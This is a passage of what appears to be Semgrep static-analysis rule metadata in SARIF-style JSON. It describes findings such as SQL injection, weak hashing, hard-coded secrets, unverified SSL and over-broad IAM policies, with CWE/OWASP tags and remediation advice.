Injection","security"]},"shortDescription":{"text":"Semgrep Finding: rust.actix.sql.postgres-taint.postgres-taint"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Unverified SSL context detected. This will permit insecure connections without verifying SSL certificates. Use 'ssl.create_default_context' instead."},"help":{"markdown":"Unverified SSL context detected. This will permit insecure connections without verifying SSL certificates. Use 'ssl.create_default_context' instead.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.security.unverified-ssl-context.unverified-ssl-context)\n - [https://docs.python.org/3/library/ssl.html#ssl-security](https://docs.python.org/3/library/ssl.html#ssl-security)\n - [https://docs.python.org/3/library/http.client.html#http.client.HTTPSConnection](https://docs.python.org/3/library/http.client.html#http.client.HTTPSConnection)\n","text":"Unverified SSL context detected. This will permit insecure connections without verifying SSL certificates. Use 'ssl.create_default_context' instead."},"helpUri":"https://semgrep.dev/r/python.lang.security.unverified-ssl-context.unverified-ssl-context","id":"python.lang.security.unverified-ssl-context.unverified-ssl-context","name":"python.lang.security.unverified-ssl-context.unverified-ssl-context","properties":{"precision":"very-high","tags":["CWE-295: Improper Certificate Validation","MEDIUM CONFIDENCE","OWASP-A03:2017 - Sensitive Data Exposure","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.lang.security.unverified-ssl-context.unverified-ssl-context"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected MD5 hash algorithm which is considered insecure. MD5 is not collision resistant and is therefore not suitable as a cryptographic signature. Use HMAC instead."},"help":{"markdown":"Detected MD5 hash algorithm which is considered insecure. MD5 is not collision resistant and is therefore not suitable as a cryptographic signature. Use HMAC instead.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.audit.crypto.use-of-md5-digest-utils.use-of-md5-digest-utils)\n - [https://owasp.org/Top10/A02_2021-Cryptographic_Failures](https://owasp.org/Top10/A02_2021-Cryptographic_Failures)\n","text":"Detected MD5 hash algorithm which is considered insecure. MD5 is not collision resistant and is therefore not suitable as a cryptographic signature. Use HMAC instead."},"helpUri":"https://semgrep.dev/r/java.lang.security.audit.crypto.use-of-md5-digest-utils.use-of-md5-digest-utils","id":"java.lang.security.audit.crypto.use-of-md5-digest-utils.use-of-md5-digest-utils","name":"java.lang.security.audit.crypto.use-of-md5-digest-utils.use-of-md5-digest-utils","properties":{"precision":"very-high","tags":["CWE-328: Use of Weak Hash","HIGH CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.audit.crypto.use-of-md5-digest-utils.use-of-md5-digest-utils"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/go.secrets.gorm.gorm-hardcoded-secret.gorm-hardcoded-secret)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"helpUri":"https://semgrep.dev/r/go.secrets.gorm.gorm-hardcoded-secret.gorm-hardcoded-secret","id":"go.secrets.gorm.gorm-hardcoded-secret.gorm-hardcoded-secret","name":"go.secrets.gorm.gorm-hardcoded-secret.gorm-hardcoded-secret","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: go.secrets.gorm.gorm-hardcoded-secret.gorm-hardcoded-secret"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"$POOL.get_virtual_price() call on a Curve pool is not protected from the read-only reentrancy."},"help":{"markdown":"$POOL.get_virtual_price() call on a Curve pool is not protected from the read-only reentrancy.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/solidity.security.curve-readonly-reentrancy.curve-readonly-reentrancy)\n - [https://chainsecurity.com/heartbreaks-curve-lp-oracles/](https://chainsecurity.com/heartbreaks-curve-lp-oracles/)\n - [https://chainsecurity.com/curve-lp-oracle-manipulation-post-mortem/](https://chainsecurity.com/curve-lp-oracle-manipulation-post-mortem/)\n","text":"$POOL.get_virtual_price() call on a Curve pool is not protected from the read-only reentrancy."},"helpUri":"https://semgrep.dev/r/solidity.security.curve-readonly-reentrancy.curve-readonly-reentrancy","id":"solidity.security.curve-readonly-reentrancy.curve-readonly-reentrancy","name":"solidity.security.curve-readonly-reentrancy.curve-readonly-reentrancy","properties":{"precision":"very-high","tags":["CWE-841: Improper Enforcement of Behavioral Workflow","HIGH CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: solidity.security.curve-readonly-reentrancy.curve-readonly-reentrancy"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"If an attacker can supply values that the application then uses to determine which class to instantiate or which method to invoke, the potential exists for the attacker to create control flow paths through the application that were not intended by the application developers. This attack vector may allow the attacker to bypass authentication or access control checks or otherwise cause the application to behave in an unexpected manner."},"help":{"markdown":"If an attacker can supply values that the application then uses to determine which class to instantiate or which method to invoke, the potential exists for the attacker to create control flow paths through the application that were not intended by the application developers. This attack vector may allow the attacker to bypass authentication or access control checks or otherwise cause the application to behave in an unexpected manner.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.audit.unsafe-reflection.unsafe-reflection)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"If an attacker can supply values that the application then uses to determine which class to instantiate or which method to invoke, the potential exists for the attacker to create control flow paths through the application that were not intended by the application developers. This attack vector may allow the attacker to bypass authentication or access control checks or otherwise cause the application to behave in an unexpected manner."},"helpUri":"https://semgrep.dev/r/java.lang.security.audit.unsafe-reflection.unsafe-reflection","id":"java.lang.security.audit.unsafe-reflection.unsafe-reflection","name":"java.lang.security.audit.unsafe-reflection.unsafe-reflection","properties":{"precision":"very-high","tags":["CWE-470: Use of Externally-Controlled Input to Select Classes or Code ('Unsafe Reflection')","LOW CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.audit.unsafe-reflection.unsafe-reflection"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Ensure EFS filesystem is encrypted at rest using KMS CMKs. CMKs gives you control over the encryption key in terms of access and rotation."},"help":{"markdown":"Ensure EFS filesystem is encrypted at rest using KMS CMKs. CMKs gives you control over the encryption key in terms of access and rotation.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/terraform.aws.security.aws-efs-filesystem-encrypted-with-cmk.aws-efs-filesystem-encrypted-with-cmk)\n - [https://owasp.org/Top10/A02_2021-Cryptographic_Failures](https://owasp.org/Top10/A02_2021-Cryptographic_Failures)\n","text":"Ensure EFS filesystem is encrypted at rest using KMS CMKs. CMKs gives you control over the encryption key in terms of access and rotation."},"helpUri":"https://semgrep.dev/r/terraform.aws.security.aws-efs-filesystem-encrypted-with-cmk.aws-efs-filesystem-encrypted-with-cmk","id":"terraform.aws.security.aws-efs-filesystem-encrypted-with-cmk.aws-efs-filesystem-encrypted-with-cmk","name":"terraform.aws.security.aws-efs-filesystem-encrypted-with-cmk.aws-efs-filesystem-encrypted-with-cmk","properties":{"precision":"very-high","tags":["CWE-320: CWE CATEGORY: Key Management Errors","MEDIUM CONFIDENCE","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: terraform.aws.security.aws-efs-filesystem-encrypted-with-cmk.aws-efs-filesystem-encrypted-with-cmk"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The use of $translateProvider.translations method can be dangerous if user input is provided to this API."},"help":{"markdown":"The use of $translateProvider.translations method can be dangerous if user input is provided to this API.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.angular.security.detect-third-party-angular-translate.detect-angular-translateprovider-translations-method)\n - [https://docs.angularjs.org/api/ng/service/$sce#trustAsUrl](https://docs.angularjs.org/api/ng/service/$sce#trustAsUrl)\n - [https://owasp.org/www-chapter-london/assets/slides/OWASPLondon20170727_AngularJS.pdf](https://owasp.org/www-chapter-london/assets/slides/OWASPLondon20170727_AngularJS.pdf)\n","text":"The use of $translateProvider.translations method can be dangerous if user input is provided to this API."},"helpUri":"https://semgrep.dev/r/javascript.angular.security.detect-third-party-angular-translate.detect-angular-translateprovider-translations-method","id":"javascript.angular.security.detect-third-party-angular-translate.detect-angular-translateprovider-translations-method","name":"javascript.angular.security.detect-third-party-angular-translate.detect-angular-translateprovider-translations-method","properties":{"precision":"very-high","tags":["CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","LOW CONFIDENCE","OWASP-A03:2021 - Injection","OWASP-A07:2017 - Cross-Site Scripting (XSS)","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.angular.security.detect-third-party-angular-translate.detect-angular-translateprovider-translations-method"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"$sceDelegateProvider allowlisting can introduce security issues if wildcards are used."},"help":{"markdown":"$sceDelegateProvider allowlisting can introduce security issues if wildcards are used.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.angular.security.detect-angular-resource-loading.detect-angular-resource-loading)\n - [https://docs.angularjs.org/api/ng/service/$sce#trustAsJs](https://docs.angularjs.org/api/ng/service/$sce#trustAsJs)\n - [https://owasp.org/www-chapter-london/assets/slides/OWASPLondon20170727_AngularJS.pdf](https://owasp.org/www-chapter-london/assets/slides/OWASPLondon20170727_AngularJS.pdf)\n","text":"$sceDelegateProvider allowlisting can introduce security issues if wildcards are used."},"helpUri":"https://semgrep.dev/r/javascript.angular.security.detect-angular-resource-loading.detect-angular-resource-loading","id":"javascript.angular.security.detect-angular-resource-loading.detect-angular-resource-loading","name":"javascript.angular.security.detect-angular-resource-loading.detect-angular-resource-loading","properties":{"precision":"very-high","tags":["CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","LOW CONFIDENCE","OWASP-A03:2021 - Injection","OWASP-A07:2017 - Cross-Site Scripting (XSS)","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.angular.security.detect-angular-resource-loading.detect-angular-resource-loading"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Possible path traversal through `tarfile.open($PATH).extractall()` if the source tar is controlled by an attacker"},"help":{"markdown":"Possible path traversal through `tarfile.open($PATH).extractall()` if the source tar is controlled by an attacker\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/trailofbits.python.tarfile-extractall-traversal.tarfile-extractall-traversal)\n - [https://docs.python.org/3/library/tarfile.html#tarfile.TarFile.extractall](https://docs.python.org/3/library/tarfile.html#tarfile.TarFile.extractall)\n","text":"Possible path traversal through `tarfile.open($PATH).extractall()` if the source tar is controlled by an attacker"},"helpUri":"https://semgrep.dev/r/trailofbits.python.tarfile-extractall-traversal.tarfile-extractall-traversal","id":"trailofbits.python.tarfile-extractall-traversal.tarfile-extractall-traversal","name":"trailofbits.python.tarfile-extractall-traversal.tarfile-extractall-traversal","properties":{"precision":"very-high","tags":["CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')","MEDIUM CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: trailofbits.python.tarfile-extractall-traversal.tarfile-extractall-traversal"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/rust.secrets.postgres.hardcoded-password.hardcoded-password)\n - [https://docs.rs/postgres/latest/postgres/](https://docs.rs/postgres/latest/postgres/)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"helpUri":"https://semgrep.dev/r/rust.secrets.postgres.hardcoded-password.hardcoded-password","id":"rust.secrets.postgres.hardcoded-password.hardcoded-password","name":"rust.secrets.postgres.hardcoded-password.hardcoded-password","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: rust.secrets.postgres.hardcoded-password.hardcoded-password"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"It looks like MD5 is used as a password hash. MD5 is not considered a secure password hash because it can be cracked by an attacker in a short amount of time. Use a suitable password hashing function such as scrypt. You can use `hashlib.scrypt`."},"help":{"markdown":"It looks like MD5 is used as a password hash. MD5 is not considered a secure password hash because it can be cracked by an attacker in a short amount of time. Use a suitable password hashing function such as scrypt. You can use `hashlib.scrypt`.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.security.audit.md5-used-as-password.md5-used-as-password)\n - [https://tools.ietf.org/html/rfc6151](https://tools.ietf.org/html/rfc6151)\n - [https://crypto.stackexchange.com/questions/44151/how-does-the-flame-malware-take-advantage-of-md5-collision](https://crypto.stackexchange.com/questions/44151/how-does-the-flame-malware-take-advantage-of-md5-collision)\n - [https://pycryptodome.readthedocs.io/en/latest/src/hash/sha3_256.html](https://pycryptodome.readthedocs.io/en/latest/src/hash/sha3_256.html)\n - [https://security.stackexchange.com/questions/211/how-to-securely-hash-passwords](https://security.stackexchange.com/questions/211/how-to-securely-hash-passwords)\n - [https://github.com/returntocorp/semgrep-rules/issues/1609](https://github.com/returntocorp/semgrep-rules/issues/1609)\n - [https://docs.python.org/3/library/hashlib.html#hashlib.scrypt](https://docs.python.org/3/library/hashlib.html#hashlib.scrypt)\n","text":"It looks like MD5 is used as a password hash. MD5 is not considered a secure password hash because it can be cracked by an attacker in a short amount of time. Use a suitable password hashing function such as scrypt. You can use `hashlib.scrypt`."},"helpUri":"https://semgrep.dev/r/python.lang.security.audit.md5-used-as-password.md5-used-as-password","id":"python.lang.security.audit.md5-used-as-password.md5-used-as-password","name":"python.lang.security.audit.md5-used-as-password.md5-used-as-password","properties":{"precision":"very-high","tags":["CWE-327: Use of a Broken or Risky Cryptographic Algorithm","MEDIUM CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: python.lang.security.audit.md5-used-as-password.md5-used-as-password"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"User data flows into this manually-constructed SQL string. User data can be safely inserted into SQL strings using prepared statements or an object-relational mapper (ORM). Manually-constructed SQL strings is a possible indicator of SQL injection, which could let an attacker steal or manipulate data from the database. Instead, use prepared statements (`$mysqli->prepare(\"INSERT INTO test(id, label) VALUES (?, ?)\");`) or a safe library."},"help":{"markdown":"User data flows into this manually-constructed SQL string. User data can be safely inserted into SQL strings using prepared statements or an object-relational mapper (ORM). Manually-constructed SQL strings is a possible indicator of SQL injection, which could let an attacker steal or manipulate data from the database. Instead, use prepared statements (`$mysqli->prepare(\"INSERT INTO test(id, label) VALUES (?, ?)\");`) or a safe library.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/php.lang.security.injection.tainted-sql-string.tainted-sql-string)\n - [https://owasp.org/www-community/attacks/SQL_Injection](https://owasp.org/www-community/attacks/SQL_Injection)\n","text":"User data flows into this manually-constructed SQL string. User data can be safely inserted into SQL strings using prepared statements or an object-relational mapper (ORM). Manually-constructed SQL strings is a possible indicator of SQL injection, which could let an attacker steal or manipulate data from the database. Instead, use prepared statements (`$mysqli->prepare(\"INSERT INTO test(id, label) VALUES (?, ?)\");`) or a safe library."},"helpUri":"https://semgrep.dev/r/php.lang.security.injection.tainted-sql-string.tainted-sql-string","id":"php.lang.security.injection.tainted-sql-string.tainted-sql-string","name":"php.lang.security.injection.tainted-sql-string.tainted-sql-string","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","MEDIUM CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: php.lang.security.injection.tainted-sql-string.tainted-sql-string"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Ensure IAM policies don't allow credentials exposure. Credentials exposure actions return credentials as part of the API response, and can possibly lead to leaking important credentials. Instead, use another action that doesn't return sensitive data as part of the API response."},"help":{"markdown":"Ensure IAM policies don't allow credentials exposure. Credentials exposure actions return credentials as part of the API response, and can possibly lead to leaking important credentials. Instead, use another action that doesn't return sensitive data as part of the API response.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/terraform.lang.security.iam.no-iam-creds-exposure.no-iam-creds-exposure)\n - [https://cloudsplaining.readthedocs.io/en/latest/glossary/credentials-exposure/](https://cloudsplaining.readthedocs.io/en/latest/glossary/credentials-exposure/)\n - [https://github.com/bridgecrewio/checkov/blob/ca830e14745c2c8e1b941985f305abe985d7f1f9/checkov/terraform/checks/data/aws/IAMCredentialsExposure.py](https://github.com/bridgecrewio/checkov/blob/ca830e14745c2c8e1b941985f305abe985d7f1f9/checkov/terraform/checks/data/aws/IAMCredentialsExposure.py)\n","text":"Ensure IAM policies don't allow credentials exposure. Credentials exposure actions return credentials as part of the API response, and can possibly lead to leaking important credentials. Instead, use another action that doesn't return sensitive data as part of the API response."},"helpUri":"https://semgrep.dev/r/terraform.lang.security.iam.no-iam-creds-exposure.no-iam-creds-exposure","id":"terraform.lang.security.iam.no-iam-creds-exposure.no-iam-creds-exposure","name":"terraform.lang.security.iam.no-iam-creds-exposure.no-iam-creds-exposure","properties":{"precision":"very-high","tags":["CWE-200: Exposure of Sensitive Information to an Unauthorized Actor","LOW CONFIDENCE","OWASP-A01:2021 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: terraform.lang.security.iam.no-iam-creds-exposure.no-iam-creds-exposure"}},{"defaultConfiguration":{"level":"note"},"fullDescription":{"text":"Detected string concatenation with a non-literal variable in a util.format / console.log function. If an attacker injects a format specifier in the string, it will forge the log message. Try to use constant values for the format string."},"help":{"markdown":"Detected string concatenation with a non-literal variable in a util.format / console.log function. If an attacker injects a format specifier in the string, it will forge the log message. Try to use constant values for the format string.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.lang.security.audit.unsafe-formatstring.unsafe-formatstring)\n - [https://cwe.mitre.org/data/definitions/134.html](https://cwe.mitre.org/data/definitions/134.html)\n","text":"Detected string concatenation with a non-literal variable in a util.format / console.log function. If an attacker injects a format specifier in the string, it will forge the log message. Try to use constant values for the format string."},"helpUri":"https://semgrep.dev/r/javascript.lang.security.audit.unsafe-formatstring.unsafe-formatstring","id":"javascript.lang.security.audit.unsafe-formatstring.unsafe-formatstring","name":"javascript.lang.security.audit.unsafe-formatstring.unsafe-formatstring","properties":{"precision":"very-high","tags":["CWE-134: Use of Externally-Controlled Format String","LOW CONFIDENCE","OWASP-A01:2021 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.lang.security.audit.unsafe-formatstring.unsafe-formatstring"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application might dynamically evaluate untrusted input, which can lead to a code injection vulnerability. An attacker can execute arbitrary code, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing code containing user input. If this is unavoidable, validate and sanitize the input, and use safe alternatives for evaluating user input."},"help":{"markdown":"The application might dynamically evaluate untrusted input, which can lead to a code injection vulnerability. An attacker can execute arbitrary code, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing code containing user input. If this is unavoidable, validate and sanitize the input, and use safe alternatives for evaluating user input.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/php.lang.security.tainted-code-execution.tainted-code-execution)\n - [https://owasp.org/www-community/attacks/Code_Injection](https://owasp.org/www-community/attacks/Code_Injection)\n - [https://stackoverflow.com/questions/3115559/exploitable-php-functions](https://stackoverflow.com/questions/3115559/exploitable-php-functions)\n - [https://github.com/FloeDesignTechnologies/phpcs-security-audit/blob/master/Security/Sniffs/BadFunctions/NoEvalsSniff.php](https://github.com/FloeDesignTechnologies/phpcs-security-audit/blob/master/Security/Sniffs/BadFunctions/NoEvalsSniff.php)\n","text":"The application might dynamically evaluate untrusted input, which can lead to a code injection vulnerability. An attacker can execute arbitrary code, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing code containing user input. If this is unavoidable, validate and sanitize the input, and use safe alternatives for evaluating user input."},"helpUri":"https://semgrep.dev/r/php.lang.security.tainted-code-execution.tainted-code-execution","id":"php.lang.security.tainted-code-execution.tainted-code-execution","name":"php.lang.security.tainted-code-execution.tainted-code-execution","properties":{"precision":"very-high","tags":["CWE-94: Improper Control of Generation of Code ('Code Injection')","MEDIUM CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: php.lang.security.tainted-code-execution.tainted-code-execution"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Checks for requests sent via Java Spring RestTemplate API to http:// URLS. This is dangerous because the server is attempting to connect to a website that does not encrypt traffic with TLS. Instead, send requests only to https:// URLS."},"help":{"markdown":"Checks for requests sent via Java Spring RestTemplate API to http:// URLS. This is dangerous because the server is attempting to connect to a website that does not encrypt traffic with TLS. Instead, send requests only to https:// URLS.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/problem-based-packs.insecure-transport.java-spring.spring-http-request.spring-http-request)\n - [https://docs.spring.io/spring/docs/current/javadoc-api/org/springframework/web/client/RestTemplate.html#delete-java.lang.String-java.util.Map-](https://docs.spring.io/spring/docs/current/javadoc-api/org/springframework/web/client/RestTemplate.html#delete-java.lang.String-java.util.Map-)\n - [https://www.baeldung.com/rest-template](https://www.baeldung.com/rest-template)\n","text":"Checks for requests sent via Java Spring RestTemplate API to http:// URLS. This is dangerous because the server is attempting to connect to a website that does not encrypt traffic with TLS. Instead, send requests only to https:// URLS."},"helpUri":"https://semgrep.dev/r/problem-based-packs.insecure-transport.java-spring.spring-http-request.spring-http-request","id":"problem-based-packs.insecure-transport.java-spring.spring-http-request.spring-http-request","name":"problem-based-packs.insecure-transport.java-spring.spring-http-request.spring-http-request","properties":{"precision":"very-high","tags":["CWE-319: Cleartext Transmission of Sensitive Information","MEDIUM CONFIDENCE","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: problem-based-packs.insecure-transport.java-spring.spring-http-request.spring-http-request"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected SQL statement that is tainted by `$EVENT` object. This could lead to SQL injection if the variable is user-controlled and not properly sanitized. In order to prevent SQL injection, use parameterized queries or prepared statements instead. You can use parameterized statements like so: `sequelize.query('SELECT * FROM projects WHERE status = ?', { replacements: ['active'], type: QueryTypes.SELECT });`"},"help":{"markdown":"Detected SQL statement that is tainted by `$EVENT` object. This could lead to SQL injection if the variable is user-controlled and not properly sanitized. In order to prevent SQL injection, use parameterized queries or prepared statements instead. You can use parameterized statements like so: `sequelize.query('SELECT * FROM projects WHERE status = ?', { replacements: ['active'], type: QueryTypes.SELECT });`\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.aws-lambda.security.sequelize-sqli.sequelize-sqli)\n - [https://sequelize.org/master/manual/raw-queries.html](https://sequelize.org/master/manual/raw-queries.html)\n","text":"Detected SQL statement that is tainted by `$EVENT` object. This could lead to SQL injection if the variable is user-controlled and not properly sanitized. In order to prevent SQL injection, use parameterized queries or prepared statements instead. You can use parameterized statements like so: `sequelize.query('SELECT * FROM projects WHERE status = ?', { replacements: ['active'], type: QueryTypes.SELECT });`"},"helpUri":"https://semgrep.dev/r/javascript.aws-lambda.security.sequelize-sqli.sequelize-sqli","id":"javascript.aws-lambda.security.sequelize-sqli.sequelize-sqli","name":"javascript.aws-lambda.security.sequelize-sqli.sequelize-sqli","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","MEDIUM CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.aws-lambda.security.sequelize-sqli.sequelize-sqli"}},{"defaultConfiguration":{"level":"note"},"fullDescription":{"text":"This hashing algorithm is insecure. If this hash is used in a security context, such as password hashing, it should be converted to a stronger hashing algorithm."},"help":{"markdown":"This hashing algorithm is insecure. If this hash is used in a security context, such as password hashing, it should be converted to a stronger hashing algorithm.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.passlib.passlib-insecure-hash.passlib-insecure-hash)\n - [https://owasp.org/Top10/A02_2021-Cryptographic_Failures](https://owasp.org/Top10/A02_2021-Cryptographic_Failures)\n - [https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/09-Testing_for_Weak_Cryptography/04-Testing_for_Weak_Encryption](https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/09-Testing_for_Weak_Cryptography/04-Testing_for_Weak_Encryption)\n","text":"This hashing algorithm is insecure. If this hash is used in a security context, such as password hashing, it should be converted to a stronger hashing algorithm."},"helpUri":"https://semgrep.dev/r/python.passlib.passlib-insecure-hash.passlib-insecure-hash","id":"python.passlib.passlib-insecure-hash.passlib-insecure-hash","name":"python.passlib.passlib-insecure-hash.passlib-insecure-hash","properties":{"precision":"very-high","tags":["CWE-328: Use of Weak Hash","HIGH CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: python.passlib.passlib-insecure-hash.passlib-insecure-hash"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Detected admin access granted in your policy. This means anyone with this policy can perform administrative actions. Instead, limit actions and resources to what you need according to least privilege."},"help":{"markdown":"Detected admin access granted in your policy. This means anyone with this policy can perform administrative actions. Instead, limit actions and resources to what you need according to least privilege.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/terraform.aws.security.aws-iam-admin-policy.aws-iam-admin-policy)\n - [https://cwe.mitre.org/data/definitions/732.html](https://cwe.mitre.org/data/definitions/732.html)\n","text":"Detected admin access granted in your policy. This means anyone with this policy can perform administrative actions. Instead, limit actions and resources to what you need according to least privilege."},"helpUri":"https://semgrep.dev/r/terraform.aws.security.aws-iam-admin-policy.aws-iam-admin-policy","id":"terraform.aws.security.aws-iam-admin-policy.aws-iam-admin-policy","name":"terraform.aws.security.aws-iam-admin-policy.aws-iam-admin-policy","properties":{"precision":"very-high","tags":["CWE-732: Incorrect Permission Assignment for Critical Resource","MEDIUM CONFIDENCE","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: terraform.aws.security.aws-iam-admin-policy.aws-iam-admin-policy"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"This socket is not encrypted. The traffic could be read by an attacker intercepting the network traffic. Use an SSLSocket created by 'SSLSocketFactory' or 'SSLServerSocketFactory' instead"},"help":{"markdown":"This socket is not encrypted. The traffic could be read by an attacker intercepting the network traffic. Use an SSLSocket created by 'SSLSocketFactory' or 'SSLServerSocketFactory' instead\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/kotlin.lang.security.unencrypted-socket.unencrypted-socket)\n - [https://owasp.org/Top10/A02_2021-Cryptographic_Failures](https://owasp.org/Top10/A02_2021-Cryptographic_Failures)\n","text":"This socket is not encrypted. The traffic could be read by an attacker intercepting the network traffic. Use an SSLSocket created by 'SSLSocketFactory' or 'SSLServerSocketFactory' instead"},"helpUri":"https://semgrep.dev/r/kotlin.lang.security.unencrypted-socket.unencrypted-socket","id":"kotlin.lang.security.unencrypted-socket.unencrypted-socket","name":"kotlin.lang.security.unencrypted-socket.unencrypted-socket","properties":{"precision":"very-high","tags":["CWE-319: Cleartext Transmission of Sensitive Information","LOW CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: kotlin.lang.security.unencrypted-socket.unencrypted-socket"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The application was observed to utilize Realm for data storage, but was not observed to set an encryption key. When no encryption key is set in the 